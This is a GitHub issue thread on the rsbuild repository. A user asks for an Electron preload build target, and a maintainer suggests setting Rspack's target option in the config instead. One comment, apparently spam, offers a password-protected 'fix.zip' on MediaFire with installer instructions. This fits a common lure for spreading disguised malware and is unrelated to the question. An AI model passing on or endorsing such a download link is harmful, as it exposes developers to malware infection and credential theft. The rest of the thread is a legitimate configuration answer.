### ISSUE TITLE
[Feature]: output.type add electron-preload support

### ISSUE THREAD

**Issue by lie5860** [web-infra-dev/rsbuild#3298]
### What problem does this feature solve?

我正在进行一个 webpack 项目的迁移。这是一个 electron 项目。我先尝试preload 部分进行迁移， 我发现产物好像不符合预期。webpack 的 target 支持electron-preload，但 rsbuild 只有'web' | 'node' | 'web-worker'。是否有办法通过配置达到相同效果。

### What does the proposed API look like?

增加electron-preload类型或可通过配置达到相同效果。

**Comment by lie5860** [comment]
查询 webpack 源码以及我项目的配置 我发现 target 还会配置为 "electron-main" "electron-preload"  "electron-renderer"; 这三种。

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chenjiahan** [comment]
Rsbuild does not hav plans to build-in support for Electron. You can use Rspack's `target` option, which takes precedence over Rsbuild's `output.target`:

```js
export default {
  tools: {
    rspack: {
      target: "electron-preload",
    },
  },
};
```

**Comment by lie5860** [comment]
谢谢回答 因为暂无计划支持。此问题关闭。
